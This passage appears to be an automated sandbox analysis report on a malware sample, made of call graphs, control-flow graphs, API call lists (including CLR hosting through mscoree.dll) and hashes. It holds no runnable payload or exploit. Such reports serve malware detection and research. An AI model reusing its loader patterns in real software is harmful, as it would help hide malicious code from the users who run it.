52850 6cea5329 52848->52850 52855 6cea5840 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 52848->52855 52850->52837 52851 6cea6c60 SafeArrayCreateVector SafeArrayAccessData 52850->52851 52852 6cea6cad 52851->52852 52853 6cea6c91 _memmove 52851->52853 52852->52842 52854 6cea6c9f SafeArrayUnaccessData 52853->52854 52854->52852 52855->52850 53020 6cec2ed0 53021 6cec2f09 53020->53021 53041 6cec3006 ctype 53020->53041 53022 6cef9bb5 77 API calls 53021->53022 53023 6cec2f31 53022->53023 53024 6cef9bb5 77 API calls 53023->53024 53025 6cec2f54 53024->53025 53026 6cea5050 77 API calls 53025->53026 53027 6cec2f6e 53026->53027 53028 6cef9bb5 77 API calls 53027->53028 53029 6cec2f75 53028->53029 53030 6cea5050 77 API calls 53029->53030 53031 6cec2f8f 53030->53031 53032 6cef9bb5 77 API calls 53031->53032 53033 6cec2f96 53032->53033 53034 6cea5050 77 API calls 53033->53034 53035 6cec2fb0 53034->53035 53036 6cef9bb5 77 API calls 53035->53036 53037 6cec2fb7 53036->53037 53038 6cea5050 77 API calls 53037->53038 53039 6cec2fd1 53038->53039 53040 6cea16b0 340 API calls 53039->53040 53040->53041 53042 6ceb9357 53043 6ceb9368 53042->53043 53179 6ceb69c0 53043->53179 53045 6cebae68 53048 6cebae7b 53045->53048 53049 6cebae72 SafeArrayDestroy 53045->53049 53046 6cebae62 SafeArrayDestroy 53046->53045 53047 6ceb93ac 53050 6ceb69c0 11 API calls 53047->53050 53100 6ceb8739 53047->53100 53051 6cebae8e 53048->53051 53052 6cebae85 SafeArrayDestroy 53048->53052 53049->53048 53061 6ceb943a 53050->53061 53053 6cebae98 SafeArrayDestroy 53051->53053 53054 6cebaea1 53051->53054 53052->53051 53053->53054 53055 6cebaeab SafeArrayDestroy 53054->53055 53056 6cebaeb4 53054->53056 53055->53056 53057 6cebaebe SafeArrayDestroy 53056->53057 53058 6cebaec7 53056->53058 53057->53058 53059 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53058->53059 53060 6cebaef5 53059->53060 53062 6ceb94b1 SafeArrayGetLBound SafeArrayGetUBound 53061->53062 53061->53100 53063 6ceb9658 53062->53063 53069 6ceb94ef 53062->53069 53064 6cead920 3 API calls 53063->53064 53075 6ceb968f 53064->53075 53065 6ceb94fd SafeArrayGetElement 53065->53069 53065->53100 53066 6ceb840e 53066->53100 53227 6ceadfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 53066->53227 53068 6ceb8441 53070 6ceb84af SafeArrayGetLBound SafeArrayGetUBound 53068->53070 53068->53100 53069->53063 53069->53065 53069->53066 53069->53100 53071 6ceb84ed SafeArrayGetElement 53070->53071 53072 6ceb8616 53070->53072 53086 6ceb8518 53071->53086 53071->53100 53228 6ceadfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 53072->53228 53074 6ceb862b 53074->53100 53229 6ceadfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 53074->53229 53078 6ceb9794 SafeArrayGetLBound SafeArrayGetUBound 53075->53078 53075->53100 53077 6ceb864b 53077->53100 53230 6ceadfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 53077->53230 53089 6ceb9c5e 53078->53089 53104 6ceb97d2 53078->53104 53080 6ceb3a90 8 API calls 53080->53086 53081 6ceb866b 53081->53100 53231 6ceadfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 53081->53231 53082 6ceb97e3 SafeArrayGetElement 53082->53100 53082->53104 53084 6cead920 3 API calls 53092 6ceb9cf8 53084->53092 53085 6ceb868a 53085->53100 53232 6ceadfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 53085->53232 53086->53071 53086->53072 53086->53080 53088 6ceb86aa 53090 6ceb69c0 11 API calls 53088->53090 53088->53100 53089->53084 53091 6ceb86cf 53090->53091 53093 6ceb69c0 11 API calls 53091->53093 53091->53100 53095 6ceb9d4f SafeArrayGetLBound SafeArrayGetUBound 53092->53095 53092->53100 53094 6ceb86f5 53093->53094 53098 6ceb69c0 11 API calls 53094->53098 53094->53100 53096 6ceb9ec7 53095->53096 53105 6ceb9d8d 53095->53105 53097 6cead920 3 API calls 53096->53097 53101 6ceb9f09 53097->53101 53098->53100 53099 6ceb9da0 SafeArrayGetElement 53099->53100 53099->53105 53100->53045 53100->53046 53101->53100 53102 6cead920 3 API calls 53101->53102 53106 6ceb9f8b 53102->53106 53103 6ceb3a90 8 API calls 53103->53105 53104->53066 53104->53082 53104->53089 53109 6ceb3a90 8 API calls 53104->53109 53105->53096 53105->53099 53105->53103 53106->53100 53107 6cead920 3 API calls 53106->53107 53108 6ceba01f 53107->53108 53108->53100 53110 6cead920 3 API calls 53108->53110 53109->53104 53111 6ceba09b 53110->53111 53111->53100 53112 6ceba1ac SafeArrayGetLBound SafeArrayGetUBound 53111->53112 53113 6ceba7b3 53112->53113 53118 6ceba1ea 53112->53118 53114 6cead920 3 API calls 53113->53114 53116 6ceba7ce 53114->53116 53115 6ceba1fd SafeArrayGetElement 53115->53118 53119 6ceba815 53115->53119 53116->53100 53117 6cead920 3 API calls 53116->53117 53117->53119 53118->53113 53118->53115 53137 6ceb3a90 8 API calls 53118->53137 53119->53100 53186 6ceb64d0 VariantInit VariantInit VariantInit SafeArrayCreateVector 53119->53186 53121 6ceba91d 53121->53100 53122 6ceb64d0 109 API calls 53121->53122 53123 6ceba950 53122->53123 53123->53100 53124 6ceb64d0 109 API calls 53123->53124 53125 6ceba983 53124->53125 53125->53100 53126 6ceb64d0 109 API calls 53125->53126 53127 6ceba9b6 53126->53127 53127->53100 53128 6ceb64d0 109 API calls 53127->53128 53129 6ceba9e9 53128->53129 53129->53100 53130 6ceb64d0 109 API calls 53129->53130 53131 6cebaa1c 53130->53131 53131->53100 53132 6ceb64d0 109 API calls 53131->53132 53133 6cebaa4f 53132->53133 53133->53100 53134 6ceb64d0 109 API calls 53133->53134 53135 6cebaa82 53134->53135 53135->53100 53136 6ceb64d0 109 API calls 53135->53136 53138 6cebaab5 53136->53138 53137->53118 53138->53100 53139 6ceb64d0 109 API calls 53138->53139 53140 6cebaae8 53139->53140 53140->53100 53141 6ceb64d0 109 API calls 53140->53141 53142 6cebab1e 53141->53142 53142->53100 53143 6cebabd0 53142->53143 53146 6cebac5a 53142->53146 53200 6ceb2970 53143->53200 53233 6cebd790 77 API calls 3 library calls 53146->53233 53149 6cebac37 53149->53100 53234 6cea1690 77 API calls 53149->53234 53151 6cebad36 53235 6cea50c0 77 API calls 53151->53235 53153 6cebad4d 53154 6cef9bb5 77 API calls 53153->53154 53155 6cebad5d 53154->53155 53156 6cea5050 77 API calls 53155->53156 53157 6cebad77 53156->53157 53236 6cea50c0 77 API calls 53157->53236 53159 6cebad82 53160 6cef9bb5 77 API calls 53159->53160 53161 6cebad89 53160->53161 53162 6cea5050 77 API calls 53161->53162 53163 6cebada7 53162->53163 53164 6cef9bb5 77 API calls 53163->53164 53165 6cebadae 53164->53165 53166 6cea5050 77 API calls 53165->53166 53167 6cebadcc 53166->53167 53237 6cea50c0 77 API calls 53167->53237 53169 6cebadd7 53170 6cef9bb5 77 API calls 53169->53170 53171 6cebade1 53170->53171 53172 6cea5050 77 API calls 53171->53172 53173 6cebadfb 53172->53173 53238 6cea50c0 77 API calls 53173->53238 53175 6cebae06 53239 6cea50c0 77 API calls 53175->53239 53177 6cebae11 53240 6cea2a40 340 API calls 53177->53240 53180 6ceb69f3 53179->53180 53181 6ceb6a01 SafeArrayGetLBound SafeArrayGetUBound 53179->53181 53180->53181 53183 6ceb6a2a 53181->53183 53185 6ceb6a92 53181->53185 53182 6ceb6a30 SafeArrayGetElement 53182->53183 53182->53185 53183->53182 53183->53185 53241 6ceb3990 8 API calls 53183->53241 53185->53047 53187 6ceb655c SafeArrayPutElement VariantClear 53186->53187 53188 6ceb6554 53186->53188 53189 6ceb6655 53187->53189 53190 6ceb6584 SafeArrayPutElement VariantClear 53187->53190 53188->53187 53192 6ceb666c VariantClear VariantClear VariantClear 53189->53192 53193 6ceb6665 SafeArrayDestroy 53189->53193 53190->53189 53194 6ceb65cd 53190->53194 53192->53121 53193->53192 53194->53189 53195 6ceadb30 5 API calls 53194->53195 53196 6ceb663a 53195->53196 53196->53189 53197 6ceb56b0 83 API calls 53196->53197 53198 6ceb664a 53197->53198 53199 6ceb6880 9 API calls 53198->53199 53199->53189 53210 6ceb29c3 53200->53210 53201 6ceb2d1a SafeArrayDestroy 53202 6ceb2d21 53201->53202 53202->53100 53214 6cebd2e0 53202->53214 53203 6ceb29ee SafeArrayGetLBound SafeArrayGetUBound 53204 6ceb2a20 SafeArrayGetElement 53203->53204 53208 6ceb2c53 53203->53208 53204->53208 53204->53210 53205 6ceb2ab6 VariantInit 53205->53210 53206 6ceb2c8b VariantClear VariantClear 53206->53208 53207 6ceb2b3a VariantInit 53207->53210 53208->53201 53208->53202 53209 6ceb2d3a VariantClear VariantClear VariantClear 53209->53208 53210->53202 53210->53203 53210->53204 53210->53205 53210->53206 53210->53207 53210->53208 53210->53209 53211 6ceb2bf9 VariantClear VariantClear VariantClear 53210->53211 53212 6ceb2cb6 VariantClear VariantClear VariantClear 53210->53212 53211->53210 53212->53208 53215 6cef9bb5 77 API calls 53214->53215 53216 6cebd32f 53215->53216 53217 6cebd3db 53216->53217 53221 6cebd33e 53216->53221 53253 6cef9533 66 API calls std::exception::_Copy_str 53217->53253 53219 6cebd3ed 53254 6cefac75 RaiseException 53219->53254 53242 6cebc530 VariantInit VariantInit SafeArrayCreateVector 53221->53242 53223 6cebd404 53225 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53226 6cebd3d5 53225->53226 53226->53149 53227->53068 53228->53074 53229->53077 53230->53081 53231->53085 53232->53088 53233->53149 53234->53151 53235->53153 53236->53159 53237->53169 53238->53175 53239->53177 53240->53100 53241->53183 53243 6cebc5ac SafeArrayPutElement VariantClear 53242->53243 53244 6cebc5a4 53242->53244 53248 6cebc5cf 53243->53248 53251 6cebc7e4 53243->53251 53244->53243 53245 6cebc7f0 SafeArrayDestroy 53246 6cebc7f7 VariantClear VariantClear 53245->53246 53247 6cebc817 53246->53247 53247->53225 53249 6cebc7d9 53248->53249 53248->53251 53258 6cef919e 67 API calls 3 library calls 53248->53258 53255 6cebdf70 53249->53255 53251->53245 53251->53246 53253->53219 53254->53223 53259 6cebd410 53255->53259 53257 6cebdf80 53257->53251 53258->53249 53260 6cebd472 VariantInit VariantInit VariantInit 53259->53260 53272 6cebd44e _memmove 53259->53272 53260->53272 53261 6cebd704 VariantClear VariantClear VariantClear 53262 6cebd75d 53261->53262 53261->53272 53262->53257 53263 6cef9d66 _malloc 66 API calls 53263->53272 53264 6cebd579 SafeArrayCreateVector SafeArrayCreateVector SafeArrayAccessData 53264->53272 53265 6cebd5ec SafeArrayPutElement 53265->53272 53266 6cebd5d6 SafeArrayUnaccessData 53266->53265 53267 6cebd633 SafeArrayPutElement VariantClear 53267->53272 53269 6cebd6fa SafeArrayDestroy 53269->53272 53270 6ceadb30 5 API calls 53270->53272 53271 6ceb56b0 83 API calls 53271->53272 53272->53257 53272->53260 53272->53261 53272->53262 53272->53263 53272->53264 53272->53265 53272->53266 53272->53267 53272->53269 53272->53270 53272->53271 53273 6ceb6880 9 API calls 53272->53273 53274 6cef9d2c 66 API calls __dosmaperr 53272->53274 53273->53272 53274->53272 53275 6cefa510 53277 6cefa515 53275->53277 53278 6ceffe93 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 53275->53278 53278->53277

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 720 6cebb6b0-6cebb758 VariantInit * 2 721 6cebb75a-6cebb75f call 6cf0c1e0 720->721 722 6cebb764-6cebb769 720->722 721->722 724 6cebb76b-6cebb770 722->724 725 6cebb773-6cebb784 722->725 724->725 727 6cebb78a-6cebb791 725->727 728 6cebbe96-6cebbeb4 VariantClear * 2 725->728 731 6cebb7b9-6cebb7e2 SafeArrayCreateVector 727->731 732 6cebb793-6cebb798 727->732 729 6cebbebe-6cebbeca 728->729 730 6cebbeb6-6cebbebb 728->730 737 6cebbecc-6cebbed1 729->737 738 6cebbed4-6cebbef2 call 6cef948b 729->738 730->729 735 6cebb7ec-6cebb809 SafeArrayPutElement VariantClear 731->735 736 6cebb7e4-6cebb7e7 731->736 733 6cebb79a-6cebb79f 732->733 734 6cebb7a2-6cebb7b3 732->734 733->734 734->728 734->731 740 6cebb80f-6cebb81d 735->740 741 6cebbe85-6cebbe8d 735->741 736->735 737->738 744 6cebb829-6cebb841 740->744 745 6cebb81f-6cebb824 call 6cf0c1e0 740->745 741->728 746 6cebbe8f-6cebbe90 SafeArrayDestroy 741->746 744->741 749 6cebb847-6cebb853 744->749 745->744 746->728 749->741 750 6cebb859-6cebb85e 749->750 750->741 751 6cebb864-6cebb86b 750->751 752 6cebb913-6cebb917 751->752 753 6cebb871-6cebb87e 751->753 754 6cebb919-6cebb91b 752->754 755 6cebb921-6cebb941 call 6ceadcd0 752->755 756 6cebb888-6cebb8ea call 6cebdbc0 call 6ceb5790 call 6cebc850 753->756 757 6cebb880-6cebb882 753->757 754->741 754->755 755->741 762 6cebb947-6cebb964 call 6ceadcd0 755->762 769 6cebb8ef-6cebb8f8 756->769 757->741 757->756 762->741 768 6cebb96a-6cebb96d 762->768 770 6cebb96f-6cebb98d call 6ceadcd0 768->770 771 6cebb993-6cebb9bf 768->771 772 6cebb8fa-6cebb8ff call 6cebe800 769->772 773 6cebb904-6cebb90e call 6cebe800 769->773 770->741 770->771 776 6cebb9cb-6cebba1d VariantClear 771->776 777 6cebb9c1-6cebb9c6 call 6cf0c1e0 771->777 784 6cebbe83 772->784 773->771 776->741 785 6cebba23-6cebba31 776->785 777->776 784->741 786 6cebba3d-6cebba8b 785->786 787 6cebba33-6cebba38 call 6cf0c1e0 785->787 786->741 790 6cebba91-6cebba95 786->790 787->786 790->741 791 6cebba9b-6cebbaa7 call 6cef9bb5 790->791 794 6cebbaa9-6cebbab4 791->794 795 6cebbab6 791->795 796 6cebbab8-6cebbacc call 6cebbf00 794->796 795->796 796->741 799 6cebbad2-6cebbada 796->799 800 6cebbadc-6cebbaed call 6ceb47d0 799->800 801 6cebbaf3-6cebbaf8 799->801 800->741 800->801 803 6cebbafa-6cebbb0b call 6ceb47d0 801->803 804 6cebbb11-6cebbb2e call 6ceb49b0 801->804 803->741 803->804 804->741 810 6cebbb34-6cebbb4b call 6cebcd20 804->810 810->741 813 6cebbb51-6cebbb8e call 6ceb5790 call 6ceb4170 810->813 818 6cebbb9a-6cebbba8 call 6cebe800 813->818 819 6cebbb90-6cebbb95 call 6cebe800 813->819 824 6cebbbae-6cebbbc0 818->824 825 6cebbca2 818->825 819->784 824->825 827 6cebbbc6-6cebbc5b call 6ceac4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6cebdb10 824->827 826 6cebbca8-6cebbcae 825->826 828 6cebbd78-6cebbdc8 826->828 829 6cebbcb4-6cebbcc6 826->829 839 6cebbc60-6cebbc75 827->839 828->784 840 6cebbdce-6cebbdd7 828->840 829->828 831 6cebbccc-6cebbd76 call 6ceac4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6cebdb10 VariantClear * 2 829->831 831->828 842 6cebbc90-6cebbca0 VariantClear * 2 839->842 843 6cebbc77-6cebbc8d 839->843 840->784 844 6cebbddd-6cebbde4 840->844 842->826 843->842 844->784 846 6cebbdea-6cebbe03 call 6cef9bb5 844->846 850 6cebbe12 846->850 851 6cebbe05-6cebbe10 call 6ceac4a0 846->851 853 6cebbe14-6cebbe3c 850->853 851->853 855 6cebbe7f 853->855 856 6cebbe3e-6cebbe50 853->856 855->784 856->855 857 6cebbe52-6cebbe65 call 6cef9bb5 856->857 860 6cebbe71 857->860 861 6cebbe67-6cebbe6f call 6ceac4a0 857->861 863 6cebbe73-6cebbe7c 860->863 861->863 863->855
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEBB73F
                                            • VariantInit.OLEAUT32(?), ref: 6CEBB748
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBB7BE
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEBB7F5
                                            • VariantClear.OLEAUT32(?), ref: 6CEBB801
                                              • Part of subcall function 6CEBC850: VariantInit.OLEAUT32(?), ref: 6CEBC88F
                                              • Part of subcall function 6CEBC850: VariantInit.OLEAUT32(?), ref: 6CEBC895
                                              • Part of subcall function 6CEBC850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBC8A0
                                              • Part of subcall function 6CEBC850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEBC8D5
                                              • Part of subcall function 6CEBC850: VariantClear.OLEAUT32(?), ref: 6CEBC8E1
                                            • VariantClear.OLEAUT32(?), ref: 6CEBBA15
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBBE90
                                            • VariantClear.OLEAUT32(?), ref: 6CEBBEA3
                                            • VariantClear.OLEAUT32(?), ref: 6CEBBEA9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                            • String ID:
                                            • API String ID: 2012514194-0
                                            • Opcode ID: d6fe2103aa0cc1344b3375f359be5601225c3ffab22c0f36615494a7efdec51d
                                            • Instruction ID: dcf8d586036ba823c21b15a05822756f109dbf0e3c965eea424c18bfa9663bcf
                                            • Opcode Fuzzy Hash: d6fe2103aa0cc1344b3375f359be5601225c3ffab22c0f36615494a7efdec51d
                                            • Instruction Fuzzy Hash: F8526C71D00218DFCB11DFA8C980BEEBBB5BF89318F258199E509AB751DB70A945CF90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 865 6ee0eb3-6ee0ece 867 6ee19bb-6ee19bf 865->867 868 6ee0ed4-6ee0ee6 865->868 869 6ee19d2-6ee1a58 867->869 870 6ee19c1-6ee19cd 867->870 874 6ee0ee8-6ee0f0a 868->874 875 6ee0f15-6ee0f36 868->875 887 6ee1a5a-6ee1a66 869->887 888 6ee1a82 869->888 871 6ee1ee8-6ee1ef5 870->871 879 6ee0f3c-6ee0f52 874->879 875->879 880 6ee0f5e-6ee1042 879->880 881 6ee0f54-6ee0f58 879->881 904 6ee106c 880->904 905 6ee1044-6ee1050 880->905 881->867 881->880 889 6ee1a68-6ee1a6e 887->889 890 6ee1a70-6ee1a76 887->890 891 6ee1a88-6ee1acd 888->891 893 6ee1a80 889->893 890->893 1021 6ee1ad0 call 7111de0 891->1021 1022 6ee1ad0 call 7111dd9 891->1022 893->891 896 6ee1ad2-6ee1adf 898 6ee1ae5-6ee1b0e 896->898 899 6ee1ae1 896->899 902 6ee1b14-6ee1b40 898->902 903 6ee1c40-6ee1c47 898->903 899->898 913 6ee1b47-6ee1b82 902->913 914 6ee1b42 902->914 909 6ee1d4f-6ee1db0 903->909 910 6ee1c4d-6ee1d4c 903->910 908 6ee1072-6ee1124 904->908 906 6ee105a-6ee1060 905->906 907 6ee1052-6ee1058 905->907 911 6ee106a 906->911 907->911 929 6ee114e 908->929 930 6ee1126-6ee1132 908->930 909->871 910->909 911->908 913->903 914->913 932 6ee1154-6ee116f 929->932 933 6ee113c-6ee1142 930->933 934 6ee1134-6ee113a 930->934 938 6ee1199 932->938 939 6ee1171-6ee117d 932->939 935 6ee114c 933->935 934->935 935->932 943 6ee119f-6ee11bd 938->943 941 6ee117f-6ee1185 939->941 942 6ee1187-6ee118d 939->942 945 6ee1197 941->945 942->945 947 6ee12db-6ee13bf 943->947 948 6ee11c3-6ee12c2 943->948 945->943 962 6ee13e9 947->962 963 6ee13c1-6ee13cd 947->963 948->947 966 6ee13ef-6ee1444 962->966 964 6ee13cf-6ee13d5 963->964 965 6ee13d7-6ee13dd 963->965 968 6ee13e7 964->968 965->968 974 6ee144a-6ee1549 966->974 975 6ee1562-6ee1638 966->975 968->966 974->975 975->867 984 6ee163e-6ee1647 975->984 986 6ee1649-6ee164c 984->986 987 6ee1652-6ee1751 984->987 986->987 988 6ee176a-6ee1781 986->988 987->988 988->867 992 6ee1787-6ee1898 988->992 1010 6ee189a-6ee189d 992->1010 1011 6ee18a3-6ee19a2 992->1011 1010->867 1010->1011 1011->867 1021->896 1022->896
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<]q$p<]q$p<]q$p<]q$Guq$Guq$Guq$Guq$Guq
                                            • API String ID: 0-3029792773
                                            • Opcode ID: 0e7291bb6d892394ff4c99e63c6a2919b8f2d90e3beebb104c5b3f5da52f8f22
                                            • Instruction ID: 015bcc5dd29a357205daf8c718fc83251bb6a109f68bf913d58665682988d91a
                                            • Opcode Fuzzy Hash: 0e7291bb6d892394ff4c99e63c6a2919b8f2d90e3beebb104c5b3f5da52f8f22
                                            • Instruction Fuzzy Hash: 6D829274E402298FDBA4DF68C998BD9B7B1AF48310F1481E9D40DAB365DB34AE85CF50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1476 6ceab6c0-6ceab715 GetModuleHandleW 1477 6ceab72a-6ceab738 GetProcAddress 1476->1477 1478 6ceab717-6ceab724 LoadLibraryW 1476->1478 1479 6ceab94c-6ceab954 1477->1479 1480 6ceab73e-6ceab750 1477->1480 1478->1477 1478->1479 1481 6ceab95e-6ceab96a 1479->1481 1482 6ceab956-6ceab95b 1479->1482 1480->1479 1486 6ceab756-6ceab771 1480->1486 1484 6ceab96c-6ceab971 1481->1484 1485 6ceab974-6ceab98f call 6cef948b 1481->1485 1482->1481 1484->1485 1486->1479 1490 6ceab777-6ceab788 1486->1490 1490->1479 1492 6ceab78e-6ceab791 1490->1492 1492->1479 1493 6ceab797-6ceab7b2 1492->1493 1493->1479 1495 6ceab7b8-6ceab7c5 1493->1495 1495->1479 1497 6ceab7cb-6ceab7d0 1495->1497 1498 6ceab7da-6ceab7e7 1497->1498 1499 6ceab7d2-6ceab7d7 1497->1499 1500 6ceab7ec-6ceab7ee 1498->1500 1499->1498 1500->1479 1501 6ceab7f4-6ceab7f9 1500->1501 1502 6ceab7fb-6ceab800 call 6cf0c1e0 1501->1502 1503 6ceab805-6ceab80a 1501->1503 1502->1503 1505 6ceab80c-6ceab811 1503->1505 1506 6ceab814-6ceab829 1503->1506 1505->1506 1506->1479 1508 6ceab82f-6ceab849 1506->1508 1509 6ceab850-6ceab85b 1508->1509 1509->1509 1510 6ceab85d-6ceab8a4 call 6cefa116 GetModuleHandleW 1509->1510 1510->1479 1513 6ceab8aa-6ceab8c1 1510->1513 1514 6ceab8c5-6ceab8d0 1513->1514 1514->1514 1515 6ceab8d2-6ceab8f0 GetProcAddress 1514->1515 1515->1479 1516 6ceab8f2-6ceab8ff call 6ce95340 1515->1516 1520 6ceab900-6ceab905 1516->1520 1520->1520 1521 6ceab907-6ceab90d 1520->1521 1521->1520 1522 6ceab90f-6ceab912 1521->1522 1523 6ceab93a 1522->1523 1524 6ceab914-6ceab929 1522->1524 1525 6ceab93d-6ceab948 call 6ceaad80 1523->1525 1526 6ceab92b-6ceab92e 1524->1526 1527 6ceab931-6ceab938 1524->1527 1525->1479 1526->1527 1527->1525
                                            APIs
                                            • GetModuleHandleW.KERNEL32(mscoree.dll,67D4BDE6), ref: 6CEAB711
                                            • LoadLibraryW.KERNEL32(mscoree.dll), ref: 6CEAB71C
                                            • GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6CEAB730
                                            • __cftoe.LIBCMT ref: 6CEAB870
                                            • GetModuleHandleW.KERNEL32(?), ref: 6CEAB88B
                                            • GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6CEAB8D7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc$LibraryLoad__cftoe
                                            • String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
                                            • API String ID: 1275574042-506955582
                                            • Opcode ID: 091ab1abd1e3aef161ccdde4c41fab1e09515550295767ba7394f042a1365c3c
                                            • Instruction ID: 5d48b2d7bc32abf8bd60ba3dd8290d4d035738d3830c944ee038fe84d86b6d66
                                            • Opcode Fuzzy Hash: 091ab1abd1e3aef161ccdde4c41fab1e09515550295767ba7394f042a1365c3c
                                            • Instruction Fuzzy Hash: C4915871D042899FCB04DFE8C8809AEBBB5FF49314F24866CE159EB750D734A906CB55
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7db6841bc0038b4e0c101beb822ffe8a4989ffea5abdbb20734d6ec129b363d0
                                            • Instruction ID: b91a33a56310acba7d900444601117fcaeb8fd8ec8c7f8752ef45d9ab5f3ea00
                                            • Opcode Fuzzy Hash: 7db6841bc0038b4e0c101beb822ffe8a4989ffea5abdbb20734d6ec129b363d0
                                            • Instruction Fuzzy Hash: 9532A074E012288FDB64DFA9C880BDDBBB2AF89300F1095AAD509B7394DB305E81CF51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 398bba4146dfb0df2d801830c60732a9c70f1d88e02744fe160dbfcc83ff67e9
                                            • Instruction ID: e918ce5f1beeb74a6551a884e459d34f43e5bf9c3781023a6dbcc5c9d3df54f7
                                            • Opcode Fuzzy Hash: 398bba4146dfb0df2d801830c60732a9c70f1d88e02744fe160dbfcc83ff67e9
                                            • Instruction Fuzzy Hash: 0F22CA74A002288FDB64DF69CD94BDDBBB6AF89300F1080E9990DA7365DB345E85CF91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 38b57784d4c5cddf620ec5264986e0b6e2479ba7d8e8e077a0b01ecba0d3d09c
